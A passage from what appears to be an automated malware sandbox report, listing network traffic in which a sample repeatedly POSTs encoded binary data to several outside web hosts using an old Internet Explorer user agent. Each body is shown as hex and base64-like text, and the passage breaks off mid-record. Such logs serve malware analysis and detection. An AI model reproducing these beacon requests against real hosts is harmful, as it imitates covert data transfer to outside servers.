CYE7bQMXI5pwnGXYClCtSixsZ/KpEfqD57QInmwPu60XEzgwEFxG+FBhZuDJX35XFY6JpKac6oK2EaHAxyBVt4OHx5z5CbQDM6mQ9dZItbGFzpXmC/ZNgsO1Dt/GF8XdHeWfKilsWJLl3elSGNe5NL6zh/VJDcT/XPxyhyFzE/zvKZurUhx2V6zTfpb62E6MXydG+0rbBhk1UN2RD556FoSOvlVFKzSfBAQQ2MoM4md1rY4r23tOySGySB74e+jCVAZGPDPCMVyktG6NUeC12JN7C1cfzoKFCxe7BdMn8l7O+uwGcFWxPwl2QEg58GNfrhco5hPzcAFYrfTuB2f2DjxOcE+vdGF+YlZQE4WIqh/upwIzhpJlxjuuhLY77Z8kiUaQCc4O7TTmWJu/XiDZhoVTMeahvyJvdQd1LxvtPcKFZ+NGcKm7zr+PDcrUouV1eYFM+zWvtEUTOyOrD4qYDJqvXlzKHhCVobaFjSJjkwuHcb2VIzSLXnK7GlTQrqG2F/hEUV4qJZ+ao5wg5DvAFu28NclxLOdw++ku5c3cXabnVSB23ICdjQo5A66DdFvlfgs=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 71 77 35 59 6a 4b 6f 5a 4a 4a 71 50 4a 67 70 37 6a 66 30 58 39 47 30 77 6a 75 58 61 34 6b 70 35 66 75 62 75 70 35 67 76 46 33 4b 51 31 2f 6c 62 2f 2b 2f 30 59 6e 4f 6c 56 2b 51 62 6b 44 2b 55 61 4e 63 78 59 74 2b 4f 2f 7a 6a 48 77 6c 54 53 44 45 4e 46 73 42 30 4d 68 4e 43 71 50 66 4f 76 69 4e 35 6e 50 38 53 41 4c 59 51 6b 38 57 75 4c 76 58 48 45 7a 34 66 6a 76 42 57 4b 6d 36 57 4b 61 68 51 4d 2b 62 70 4e 38 6e 68 4c 69 47 74 74 38 35 46 69 38 2f 77 77 4d 49 6b 6d 4c 30 36 71 31 70 6b 34 61 77 64 74 68 69 51 39 67 4e 58 51 58 69 67 45 4b 32 51 38 4c 48 35 72 2f 2b 77 74 41 36 56 59 33 2b 44 78 50 64 69 67 4e 4e 5a 33 4f 6e 35 35 50 77 48 79 4f 41 53 5a 78 46 49 56 54 77 50 63 34 75 37 45 6a 37 6d 69 53 71 63 66 36 4d 68 62 47 4a 6b 66 59 39 77 46 6f 66 6a 38 47 70 63 64 47 78 57 69 49 43 36 79 7a 59 32 32 63 6e 72 39 67 37 6c 6e 54 30 6f 30 45 54 56 64 52 4f 43 46 52 75 4c 6c 77 69 4c 68 65 38 34 4e 77 30 4a 2b 56 4e 71 50 59 76 47 71 6f 6a 41 31 32 70 49 35 57 4d 4c 4f 4c 56 45 2b 5a 30 72 63 2b 39 77 50 75 59 6a 42 66 39 53 30 48 33 59 77 67 30 53 46 72 65 61 4b 6f 59 74 52 6a 6f 51 54 76 34 30 44 64 4a 55 75 68 38 61 36 47 4e 72 65 49 54 71 6c 55 58 6c 4f 55 69 2b 39 2b 37 73 79 63 57 6c 2f 75 65 39 53 56 53 6a 65 58 43 6f 6e 4d 70 35 63 5a 31 6c 51 49 67 63 79 4e 70 67 75 4f 67 4d 72 45 63 79 4a 45 6a 64 54 6a 33 35 6f 4c 4d 66 63 59 71 51 32 66 30 34 41 53 44 71 79 41 33 74 70 42 72 44 57 4b 75 32 72 48 74 39 2f 63 74 59 43 67 35 6f 71 34 68 56 33 35 7a 6a 4a 56 75 62 30 36 58 5a 54 68 76 33 57 64 2b 53 55 49 51 72 57 51 48 45 35 7a 63 44 76 6f 53 42 37 53 75 45 36 31 49 79 30 51 45 37 44 6e 69 62 4f 41 66 51 7a 59 54 41 3d Data Ascii: qw5YjKoZJJqPJgp7jf0X9G0wjuXa4kp5fubup5gvF3KQ1/lb/+/0YnOlV+QbkD+UaNcxYt+O/zjHwlTSDENFsB0MhNCqPfOviN5nP8SALYQk8WuLvXHEz4fjvBWKm6WKahQM+bpN8nhLiGtt85Fi8/wwMIkmL06q1pk4awdthiQ9gNXQXigEK2Q8LH5r/+wtA6VY3+DxPdigNNZ3On55PwHyOASZxFIVTwPc4u7Ej7miSqcf6MhbGJkfY9wFofj8GpcdGxWiIC6yzY22cnr9g7lnT0o0ETVdROCFRuLlwiLhe84Nw0J+VNqPYvGqojA12pI5WMLOLVE+Z0rc+9wPuYjBf9S0H3Ywg0SFreaKoYtRjoQTv40DdJUuh8a6GNreITqlUXlOUi+9+7sycWl/ue9SVSjeXConMp5cZ1lQIgcyNpguOgMrEcyJEjdTj35oLMfcYqQ2f04ASDqyA3tpBrDWKu2rHt9/ctYCg5oq4hV35zjJVub06XZThv3Wd+SUIQrWQHE5zcDvoSB7SuE61Iy0QE7DnibOAfQzYTA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 74 57 66 7a 6c 66 5a 4b 56 70 72 56 64 78 58 54 55 63 57 30 78 70 6b 50 43 4b 30 57 58 42 71 50 69 6d 62 44 42 30 69 39 65 54 6d 41 58 42 74 6e 79 43 62 76 76 2b 50 61 50 4a 4c 72 63 42 32 62 73 37 58 31 70 49 6e 70 66 59 7a 51 71 69 4c 39 66 65 5a 72 46 71 74 44 55 67 61 70 58 34 30 6d 6b 30 37 33 6b 48 48 2f 43 4a 4f 2b 46 2b 42 52 57 77 44 46 56 31 35 78 6a 2f 4b 7a 55 6f 36 7a 56 5a 6a 32 63 34 6f 75 53 65 48 63 67 49 4c 58 4c 38 43 4b 52 6c 79 71 45 75 6a 67 67 44 68 4d 4c 32 67 66 48 33 66 6c 56 51 2b 57 57 38 51 4f 49 31 72 35 53 66 50 54 77 35 7a 68 57 50 52 70 33 77 47 78 6b 68 73 35 44 72 56 74 65 66 36 6e 55 6d 69 51 42 73 41 6a 69 4b 41 79 55 47 4f 30 4e 55 49 6b 31 46 54 59 50 54 52 68 34 70 71 67 75 33 4e 6f 62 43 76 30 6d 4f 73 4c 31 4e 56 76 70 55 4c 67 71 64 58 72 6f 51 62 74 59 71 44 42 35 74 39 4e 37 2f 65 72 70 31 31 7a 36 45 6c 71 36 35 66 43 39 42 63 37 64 76 58 59 30 71 54 53 76 51 52 42 73 78 79 54 73 41 36 66 2b 6f 31 42 62 74 4a 2f 79 78 43 53 58 65 6a 52 30 72 67 4a 78 76 35 50 4d 38 73 63 43 55 4f 70 42 78 71 4d 42 35 48 57 57 62 36 53 42 31 37 58 6d 78 50 37 71 2b 6c 7a 4a 4a 4d 4d 78 45 6f 36 6f 59 33 4d 66 6a 70 70 73 78 2b 4b 42 62 4a 56 51 52 53 45 4d 34 53 66 6b 62 4a 78 63 59 54 59 55 41 57 54 50 5a 55 6a 4e 79 49 68 42 67 33 61 54 64 42 6b 33 55 59 53 47 6c 59 6f 53 53 65 47 75 45 2f 66 42 71 68 62 4a 41 53 46 42 78 4e 43 50 6d 6d 34 78 54 35 73 6c 73 56 76 2b 54 70 36 61 4f 38 6b 79 62 73 6b 39 73 49 2f 46 55 2b 5a 33 56 4a 79 71 37 4d 6f 4f 68 78 48 57 56 66 4d 41 77 44 75 54 79 6c 38 67 5a 76 61 73 31 65 6f 46 61 75 37 78 67 51 4f 77 73 51 7a 77 72 4f 79 41 4b 67 4f 54 58 4b 48 Data Ascii: tWfzlfZKVprVdxXTUcW0xpkPCK0WXBqPimbDB0i9eTmAXBtnyCbvv+PaPJLrcB2bs7X1pInpfYzQqiL9feZrFqtDUgapX40mk073kHH/CJO+F+BRWwDFV15xj/KzUo6zVZj2c4ouSeHcgILXL8CKRlyqEujggDhML2gfH3flVQ+WW8QOI1r5SfPTw5zhWPRp3wGxkhs5DrVtef6nUmiQBsAjiKAyUGO0NUIk1FTYPTRh4pqgu3NobCv0mOsL1NVvpULgqdXroQbtYqDB5t9N7/erp11z6Elq65fC9Bc7dvXY0qTSvQRBsxyTsA6f+o1BbtJ/yxCSXejR0rgJxv5PM8scCUOpBxqMB5HWWb6SB17XmxP7q+lzJJMMxEo6oY3Mfjppsx+KBbJVQRSEM4SfkbJxcYTYUAWTPZUjNyIhBg3aTdBk3UYSGlYoSSeGuE/fBqhbJASFBxNCPmm4xT5slsVv+Tp6aO8kybsk9sI/FU+Z3VJyq7MoOhxHWVfMAwDuTyl8gZvas1eoFau7xgQOwsQzwrOyAKgOTXKH
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.2print.comCache-Control: no-cacheData Raw: 33 72 4a 43 73 70 47 47 58 35 70 4c 43 70 4d 51 4d 49 34 50 52 2b 6f 59 64 50 74 50 6d 77 44 6c 56 63 59 4b 41 62 4c 71 54 7a 6e 4b 77 4b 6d 63 30 5a 63 58 49 5a 44 51 45 74 48 78 65 55 61 68 57 66 6b 63 43 47 68 76 34 52 67 4a 67 58 4b 33 51 68 49 5a 43 58 71 57 74 4c 62 4c 4b 53 61 34 73 35 77 44 4e 4e 42 77 7a 6a 76 31 45 69 7a 6e 36 72 48 51 53 4c 2b 34 43 74 41 37 48 59 37 2f 43 66 68 36 53 76 4f 35 35 63 4a 44 70 6b 50 59 37 67 48 5a 4f 36 31 4f 64 47 39 47 64 41 2b 51 63 37 63 75 77 66 4f 4a 34 66 38 79 2b 73 4b 6d 52 6f 33 46 31 78 77 7a 32 6b 49 37 6d 36 58 72 4d 32 77 4e 6a 52 66 48 32 54 78 75 30 79 4d 47 41 6a 71 50 30 45 46 6c 63 51 64 6d 6e 33 47 66 2f 59 73 54 52 72 31 42 52 59 7a 42 4a 77 69 45 64 2f 36 4f 6a 50 34 46 46 64 66 74 75 44 77 67 6b 72 53 59 42 47 65 70 39 69 52 73 6d 5a 2b 4b 2f 66 46 6c 33 62 72 4c 75 6c 6b 7a 52 47 38 36 39 52 58 31 4f 4e 67 2b 4b 73 67 39 37 65 44 52 66 67 51 61 43 71 36 32 77 30 5a 58 37 5a 4f 57 69 4e 59 48 52 4c 67 68 70 76 5a 32 77 45 57 62 61 6d 48 74 57 6e 33 75 77 73 4c 30 50 55 39 77 78 49 71 66 31 38 30 39 79 53 50 2f 39 52 41 76 2b 64 44 66 52 48 43 74 44 6d 35 36 6d 30 49 5a 30 35 6d 74 34 65 62 46 4c 6b 6a 2b 75 39 58 35 73 44 52 50 4a 50 33 61 55 71 6c 59 6a 6e 66 32 2f 2b 2b 35 47 72 42 79 79 7a 41 6f 34 51 5a 44 59 57 65 4c 36 42 4a 75 7a 52 49 36 6d 4b 77 54 43 6e 33 6e 79 71 6a 36 52 34 57 79 6b 44 4e 6f 37 67 43 31 35 78 67 2b 64 4d 44 77 71 64 58 59 71 76 55 66 54 71 6c 46 4c 59 49 6f 77 2f 52 57 76 62 51 7a 45 78 46 4c 47 78 6a 77 6e 30 69 58 6a 61 33 2f 78 49 39 45 6d 54 74 79 54 7a 34 75 47 2f 72 68 4c 79 72 64 43 77 5a 65 7a 41 54 4e 54 38 65 77 69 5a 64 35 4c 42 2b 4a 57 51 3d 3d Data Ascii: 3rJCspGGX5pLCpMQMI4PR+oYdPtPmwDlVcYKAbLqTznKwKmc0ZcXIZDQEtHxeUahWfkcCGhv4RgJgXK3QhIZCXqWtLbLKSa4s5wDNNBwzjv1Eizn6rHQSL+4CtA7HY7/Cfh6SvO55cJDpkPY7gHZO61OdG9GdA+Qc7cuwfOJ4f8y+sKmRo3F1xwz2kI7m6XrM2wNjRfH2Txu0yMGAjqP0EFlcQdmn3Gf/YsTRr1BRYzBJwiEd/6OjP4FFdftuDwgkrSYBGep9iRsmZ+K/fFl3brLulkzRG869RX1ONg+Ksg97eDRfgQaCq62w0ZX7ZOWiNYHRLghpvZ2wEWbamHtWn3uwsL0PU9wxIqf1809ySP/9RAv+dDfRHCtDm56m0IZ05mt4ebFLkj+u9X5sDRPJP3aUqlYjnf2/++5GrByyzAo4QZDYWeL6BJuzRI6mKwTCn3nyqj6R4WykDNo7gC15xg+dMDwqdXYqvUfTqlFLYIow/RWvbQzExFLGxjwn0iXja3/xI9EmTtyTz4uG/rhLyrdCwZezATNT8ewiZd5LB+JWQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.x0c.comCache-Control: no-cacheData Raw: 51 38 62 38 68 35 6a 48 62 70 71 35 4a 5a 37 31 6d 36 5a 74 74 59 75 4f 62 46 74 67 65 6d 76 61 54 43 79 71 79 50 75 77 31 6b 6d 54 6a 4f 76 33 35 6d 70 52 38 4a 34 4d 50 68 75 6f 31 72 50 67 34 72 65 71 54 6f 58 53 50 6c 46 6e 71 38 35 39 56 65 58 32 77 78 36 52 4f 77 67 46 63 69 56 59 56 58 44 4a 45 71 69 39 66 72 6e 71 4a 57 44 39 4f 5a 42 4f 38 51 6f 79 53 42 2b 38 77 35 6a 68 31 63 6f 6f 64 6c 62 6e 4d 56 63 5a 41 36 73 7a 39 71 6e 73 35 4e 30 73 66 6a 34 52 30 49 72 38 63 48 45 4e 6f 72 6e 6f 57 73 55 30 39 50 7a 64 75 74 57 51 7a 32 73 71 37 42 51 42 59 35 65 61 57 70 64 53 5a 67 4e 4d 2f 39 68 46 33 45 71 74 39 77 55 48 2b 70 6f 66 6a 67 73 51 41 55 63 2b 62 6e 49 59 55 4b 73 57 64 6e 32 72 35 59 52 59 59 59 73 4d 55 66 6a 6e 48 39 51 4e 53 35 63 41 54 4e 39 77 4d 30 2f 46 39 42 71 58 77 50 74 35 4f 39 66 44 37 54 76 2f 38 68 69 53 76 39 67 6e 6c 37 55 31 42 65 53 2f 66 4c 72 31 73 65 52 56 68 4a 51 42 4f 78 6b 56 6f 68 30 47 68 39 6b 62 47 4d 6f 68 6a 45 6a 6b 31 6e 66 39 57 65 4a 48 6c 37 48 6b 63 46 69 32 66 44 32 6c 59 77 2b 39 33 79 72 50 2b 41 51 4b 4c 72 43 50 50 57 50 43 6f 39 2b 79 36 42 41 54 2f 50 5a 54 75 4c 66 64 51 64 43 4d 44 65 7a 52 49 43 31 31 7a 37 73 46 35 72 4e 50 53 4c 69 56 2b 37 61 4b 6b 78 67 61 44 4d 37 62 56 79 47 6d 50 72 37 6c 59 6c 69 39 6d 30 41 79 6d 7a 4a 56 4b 49 77 70 4e 77 58 4f 39 2b 73 34 46 34 77 6d 63 63 50 6c 7a 53 68 62 68 42 32 6f 71 2f 61 36 6a 75 4a 76 45 61 71 6f 6f 64 6f 7a 51 54 6b 78 2b 4a 61 61 39 63 7a 6e 34 6c 6e 72 59 71 71 52 65 7a 4c 2f 57 65 64 55 47 54 4c 55 2f 35 43 62 58 4a 4a 69 77 39 7a 49 64 4f 37 52 68 6d 4f 71 66 6d 54 74 71 79 78 59 76 6f 6d 67 35 57 72 2f 32 66 76 7a Data Ascii: Q8b8h5jHbpq5JZ71m6ZttYuObFtgemvaTCyqyPuw1kmTjOv35mpR8J4MPhuo1rPg4reqToXSPlFnq859VeX2wx6ROwgFciVYVXDJEqi9frnqJWD9OZBO8QoySB+8w5jh1coodlbnMVcZA6sz9qns5N0sfj4R0Ir8cHENornoWsU09PzdutWQz2sq7BQBY5eaWpdSZgNM/9hF3Eqt9wUH+pofjgsQAUc+bnIYUKsWdn2r5YRYYYsMUfjnH9QNS5cATN9wM0/F9BqXwPt5O9fD7Tv/8hiSv9gnl7U1BeS/fLr1seRVhJQBOxkVoh0Gh9kbGMohjEjk1nf9WeJHl7HkcFi2fD2lYw+93yrP+AQKLrCPPWPCo9+y6BAT/PZTuLfdQdCMDezRIC11z7sF5rNPSLiV+7aKkxgaDM7bVyGmPr7lYli9m0AymzJVKIwpNwXO9+s4F4wmccPlzShbhB2oq/a6juJvEaqoodozQTkx+Jaa9czn4lnrYqqRezL/WedUGTLU/5CbXJJiw9zIdO7RhmOqfmTtqyxYvomg5Wr/2fvz
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fnsds.orgCache-Control: no-cacheData Raw: 4b 49 63 72 4f 6c 56 79 70 70 70 59 49 78 38 69 50 4a 2b 39 6b 6b 34 74 34 4e 56 6a 76 47 45 4b 57 57 79 58 65 33 6c 35 57 32 4a 76 39 73 43 58 50 62 63 30 54 46 74 6b 5a 6e 46 66 6d 37 66 6f 68 70 31 4a 54 42 51 4f 67 39 53 71 43 6e 6b 4d 35 38 55 55 39 4e 72 74 72 61 49 62 71 63 44 64 44 75 42 53 6d 5a 64 61 63 33 33 63 32 76 69 68 43 4b 5a 62 54 79 2f 57 71 6a 68 66 52 55 32 4c 36 49 4c 61 70 6e 4e 4f 43 66 6c 73 56 44 47 2f 61 43 5a 6f 42 4f 78 61 4b 2b 63 39 37 42 52 69 4c 37 4f 6d 4d 36 35 46 45 6e 50 56 49 7a 77 6d 62 70 73 66 75 30 38 51 33 34 77 72 55 6d 4d 62 55 70 5a 70 69 52 59 38 4c 52 4c 79 32 37 2f 2b 6c 6c 35 36 46 49 70 45 57 72 67 64 78 4c 66 52 75 56 6c 37 35 78 79 4b 61 4a 47 49 4c 33 79 50 69 4e 4c 6a 73 77 59 67 4a 63 73 35 4b 76 45 62 6a 6b 70 36 66 71 77 37 4c 32 6f 36 5a 30 62 33 59 63 77 34 4f 53 30 4e 66 47 50 7a 4f 44 2f 54 35 52 6f 41 44 50 75 71 37 59 6b 78 62 35 33 43 68 32 56 43 4a 72 5a 35 74 6b 6d 68 72 6f 49 70 6d 66 58 48 51 34 46 65 62 4d 78 32 37 37 76 70 58 63 73 74 63 64 51 43 56 6b 66 71 6d 72 52 6a 79 67 47 70 68 70 67 68 55 74 48 64 6a 2f 38 63 76 79 64 34 34 52 4d 44 4f 4f 6b 46 6d 37 7a 49 6f 42 38 7a 43 35 51 30 50 78 44 67 75 49 31 61 67 6e 55 39 5a 72 66 34 58 7a 38 59 62 2b 30 64 78 75 41 75 57 74 61 39 76 78 30 5a 64 2f 39 52 69 47 33 61 64 39 39 4a 6a 35 4a 6a 66 76 41 45 6a 44 77 45 43 51 55 4f 67 76 36 46 46 43 69 70 38 46 4c 71 4b 56 7a 6f 61 6a 4d 76 45 6a 6e 70 4c 72 73 64 57 2f 46 34 4f 6b 51 61 75 57 4a 69 66 55 79 65 4c 72 2f 67 78 62 45 34 67 32 58 2b 4d 50 65 7a 71 4d 36 48 2f 52 6e 34 70 49 4c 75 78 4b 52 44 44 7a 71 58 33 43 59 62 34 4e 36 78 37 5a 46 33 78 50 4b 32 4e 61 74 78 72 57 63 47 6c 56 71 64 67 34 45 6b 6b 44 65 59 Data Ascii: KIcrOlVypppYIx8iPJ+9kk4t4NVjvGEKWWyXe3l5W2Jv9sCXPbc0TFtkZnFfm7fohp1JTBQOg9SqCnkM58UU9NrtraIbqcDdDuBSmZdac33c2vihCKZbTy/WqjhfRU2L6ILapnNOCflsVDG/aCZoBOxaK+c97BRiL7OmM65FEnPVIzwmbpsfu08Q34wrUmMbUpZpiRY8LRLy27/+ll56FIpEWrgdxLfRuVl75xyKaJGIL3yPiNLjswYgJcs5KvEbjkp6fqw7L2o6Z0b3Ycw4OS0NfGPzOD/T5RoADPuq7Ykxb53Ch2VCJrZ5tkmhroIpmfXHQ4FebMx277vpXcstcdQCVkfqmrRjygGphpghUtHdj/8cvyd44RMDOOkFm7zIoB8zC5Q0PxDguI1agnU9Zrf4Xz8Yb+0dxuAuWta9vx0Zd/9RiG3ad99Jj5JjfvAEjDwECQUOgv6FFCip8FLqKVzoajMvEjnpLrsdW/F4OkQauWJifUyeLr/gxbE4g2X+MPezqM6H/Rn4pILuxKRDDzqX3CYb4N6x7ZF3xPK2NatxrWcGlVqdg4EkkDeY
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pohlfood.comCache-Control: no-cacheData Raw: 56 73 78 35 63 5a 6a 65 75 4a 72 7a 67 72 4f 5a 6d 39 46 61 66 59 75 35 6d 54 52 67 48 58 42 35 54 43 74 69 72 4d 71 6e 7a 69 66 6c 73 48 6c 41 51 6b 75 73 34 4b 51 61 59 6f 4e 6e 4b 52 6e 4d 6e 53 2b 68 52 43 32 30 6f 48 4d 36 67 43 39 73 76 69 57 73 62 6b 30 70 57 36 48 57 75 73 41 33 79 39 73 73 32 58 38 74 71 32 4a 6e 74 6b 62 68 6a 55 61 38 79 67 5a 50 50 79 38 68 5a 4b 52 68 6d 38 6b 62 6d 58 57 4d 34 2b 57 55 66 4a 44 36 76 44 71 61 34 68 71 47 48 4d 4f 33 62 66 6d 5a 69 48 38 54 62 35 32 42 42 65 6a 4b 4d 49 56 31 47 61 4e 45 54 64 54 70 4d 41 33 6b 39 33 49 75 36 74 72 2f 33 6e 37 4a 31 67 73 45 2b 79 51 4d 37 49 34 2f 51 41 72 38 47 78 44 6e 2b 72 6a 45 63 6a 4e 4f 4d 4f 49 79 78 76 63 66 50 38 67 46 6b 67 49 61 69 35 66 30 61 2b 54 39 4b 64 71 75 51 58 52 6c 4f 4b 6c 30 62 4d 47 69 48 57 7a 4f 4a 52 4b 52 6c 57 44 33 6b 7a 30 63 36 76 72 42 74 47 46 49 76 74 66 4b 65 68 69 6e 6c 36 53 6b 64 31 75 56 38 6a 4a 44 58 57 31 5a 76 65 6b 34 38 48 64 6e 48 41 72 6d 2b 52 37 69 44 47 6c 35 68 4f 2f 64 64 30 43 2b 67 2f 62 4c 73 31 4b 56 6e 34 63 55 46 45 6c 70 4d 4a 5a 31 36 47 63 65 50 56 34 65 47 70 5a 4f 41 45 72 6b 47 75 4a 39 47 4a 65 48 36 6c 38 36 38 6f 76 68 37 79 38 7a 62 49 69 66 2f 6d 47 70 74 66 2f 4f 71 51 57 6f 34 78 30 56 76 43 67 6b 70 37 72 58 49 56 70 58 51 6b 6b 4c 76 56 42 79 32 6b 6c 6e 4e 67 64 32 32 4f 35 36 36 42 62 70 58 41 67 68 37 47 64 48 32 56 71 59 70 50 2b 37 42 62 6a 4a 4c 2b 76 4f 34 34 6f 54 77 6f 68 44 36 4a 6d 58 4b 70 39 34 7a 70 33 31 49 41 61 53 34 76 47 50 69 76 55 59 55 71 38 65 30 48 39 76 43 58 41 6f 74 53 49 63 41 76 36 38 30 57 52 32 33 58 59 3d Data Ascii: Vsx5cZjeuJrzgrOZm9FafYu5mTRgHXB5TCtirMqnziflsHlAQkus4KQaYoNnKRnMnS+hRC20oHM6gC9sviWsbk0pW6HWusA3y9ss2X8tq2JntkbhjUa8ygZPPy8hZKRhm8kbmXWM4+WUfJD6vDqa4hqGHMO3bfmZiH8Tb52BBejKMIV1GaNETdTpMA3k93Iu6tr/3n7J1gsE+yQM7I4/QAr8GxDn+rjEcjNOMOIyxvcfP8gFkgIai5f0a+T9KdquQXRlOKl0bMGiHWzOJRKRlWD3kz0c6vrBtGFIvtfKehinl6Skd1uV8jJDXW1Zvek48HdnHArm+R7iDGl5hO/dd0C+g/bLs1KVn4cUFElpMJZ16GcePV4eGpZOAErkGuJ9GJeH6l868ovh7y8zbIif/mGptf/OqQWo4x0VvCgkp7rXIVpXQkkLvVBy2klnNgd22O566BbpXAgh7GdH2VqYpP+7BbjJL+vO44oTwohD6JmXKp94zp31IAaS4vGPivUYUq8e0H9vCXAotSIcAv680WR23XY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tyrns.comCache-Control: no-cacheData Raw: 6e 6f 4c 73 61 2b 78 51 79 5a 72 6a 4c 34 79 41 31 78 66 79 4e 66 39 6d 36 37 5a 45 49 47 34 74 34 4c 69 52 69 76 39 4c 54 4a 37 57 6b 32 6e 32 37 77 46 68 45 37 6d 61 79 4e 75 73 39 65 36 63 69 59 78 6a 74 4f 42 70 55 38 35 43 49 49 49 34 32 71 6b 57 45 47 39 61 54 70 58 6b 49 7a 39 4a 44 72 33 63 4d 62 77 31 52 2f 4a 53 43 63 61 30 48 51 75 69 56 6d 4e 39 42 79 4f 7a 36 53 52 6e 4b 66 43 45 67 46 65 7a 6c 38 63 4e 33 4b 6e 4c 4c 33 4d 30 39 4c 38 58 59 74 62 2b 64 36 56 54 6b 45 53 43 55 35 6c 2b 32 75 71 4a 58 6d 41 57 4b 32 53 71 6f 2f 52 44 55 33 4b 6e 62 75 64 59 32 6e 61 44 66 38 4e 6d 6a 5a 68 54 37 52 4f 4d 50 66 35 35 74 52 45 55 72 67 55 41 77 4a 31 77 69 35 70 75 4c 42 53 61 45 41 44 64 4a 69 50 37 73 30 62 34 61 31 75 51 74 46 46 49 43 71 43 4f 45 69 34 73 71 68 62 6c 58 42 62 42 42 6f 30 79 75 34 52 77 35 6d 61 48 42 4b 42 6b 39 53 4c 37 78 7a 6d 78 6f 46 34 6c 42 68 43 54 38 73 6c 4b 62 56 49 48 2b 63 46 55 2b 6f 55 44 58 79 49 37 77 49 45 62 34 33 53 30 5a 76 37 41 66 67 65 38 6a 2f 67 36 35 37 66 31 71 39 44 61 34 35 6a 76 30 36 67 48 2f 42 79 31 48 2f 52 37 67 66 51 6d 42 45 4e 71 49 41 74 48 68 43 64 78 63 70 42 33 79 51 44 6e 55 5a 39 5a 4a 6e 51 6f 4b 32 6f 75 75 45 71 48 44 72 55 78 58 75 38 6f 52 78 69 6c 44 77 65 6d 44 77 6f 6a 56 4b 6b 4c 56 4d 35 56 35 45 66 78 5a 4c 72 6d 45 51 75 42 75 44 65 5a 34 4a 70 69 75 52 6a 47 73 51 72 4e 2b 58 44 42 58 33 72 55 4b 51 77 75 59 7a 70 30 52 57 35 37 47 6b 73 6a 4a 32 48 39 53 38 79 32 31 2f 6d 41 34 4f 59 58 37 51 4a 48 41 42 34 54 53 34 48 51 38 6e 76 39 39 58 55 49 4d 39 67 77 37 58 74 42 57 31 65 6f 73 54 39 33 74 6d 70 38 57 38 6a 48 66 35 47 71 36 76 51 66 31 66 36 62 48 42 39 2b 35 59 34 66 Data Ascii: noLsa+xQyZrjL4yA1xfyNf9m67ZEIG4t4LiRiv9LTJ7Wk2n27wFhE7mayNus9e6ciYxjtOBpU85CIII42qkWEG9aTpXkIz9JDr3cMbw1R/JSCca0HQuiVmN9ByOz6SRnKfCEgFezl8cN3KnLL3M09L8XYtb+d6VTkESCU5l+2uqJXmAWK2Sqo/RDU3KnbudY2naDf8NmjZhT7ROMPf55tREUrgUAwJ1wi5puLBSaEADdJiP7s0b4a1uQtFFICqCOEi4sqhblXBbBBo0yu4Rw5maHBKBk9SL7xzmxoF4lBhCT8slKbVIH+cFU+oUDXyI7wIEb43S0Zv7Afge8j/g657f1q9Da45jv06gH/By1H/R7gfQmBENqIAtHhCdxcpB3yQDnUZ9ZJnQoK2ouuEqHDrUxXu8oRxilDwemDwojVKkLVM5V5EfxZLrmEQuBuDeZ4JpiuRjGsQrN+XDBX3rUKQwuYzp0RW57GksjJ2H9S8y21/mA4OYX7QJHAB4TS4HQ8nv99XUIM9gw7XtBW1eosT93tmp8W8jHf5Gq6vQf1f6bHB9+5Y4f
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.spanesi.comCache-Control: no-cacheData Raw: 64 41 31 37 71 57 4a 42 35 4a 72 38 38 4c 6d 48 31 56 47 6c 62 75 57 49 37 71 72 79 73 43 61 47 74 6d 32 54 74 6c 42 47 79 71 7a 32 6f 6e 36 62 73 75 4e 37 4f 4f 61 4e 51 54 74 4a 42 73 4f 41 72 45 51 33 4d 4b 4d 5a 56 46 30 52 46 70 64 31 53 4e 34 71 35 45 38 31 6e 45 62 64 49 7a 57 45 31 6f 4e 77 47 31 36 57 78 33 57 30 54 62 6e 78 31 5a 48 4c 63 46 45 6d 42 39 31 56 4b 6e 63 2b 36 76 47 4f 69 4e 49 59 70 34 72 69 30 43 2b 58 7a 79 71 34 37 4d 62 69 6b 75 30 6a 4f 68 6e 2f 74 4c 67 2f 68 66 62 4a 53 39 6b 39 41 61 6c 39 6d 4a 37 37 35 75 4a 6e 58 78 50 72 77 36 6e 46 72 61 4e 57 78 38 6f 59 41 6d 36 48 6b 31 56 72 32 45 7a 57 46 41 71 32 2f 53 43 46 31 43 62 51 4b 39 4f 44 39 39 43 58 36 70 79 75 34 38 51 47 30 43 5a 76 6d 53 73 54 66 44 6d 59 57 33 4b 6c 46 6b 6f 47 4c 61 4e 6c 33 37 54 66 4f 6e 62 59 2b 48 74 55 32 74 50 36 6b 34 65 34 4e 59 4a 6a 30 44 35 6c 49 6d 6b 77 6b 35 39 6a 55 30 4b 68 52 49 74 43 2b 71 5a 64 43 43 45 2f 6c 7a 63 38 67 5a 71 69 56 46 6a 77 6b 68 31 70 4b 54 33 30 67 61 68 54 77 4f 47 67 70 57 2b 42 6c 44 61 53 43 54 54 57 5a 41 42 57 6b 65 55 4d 76 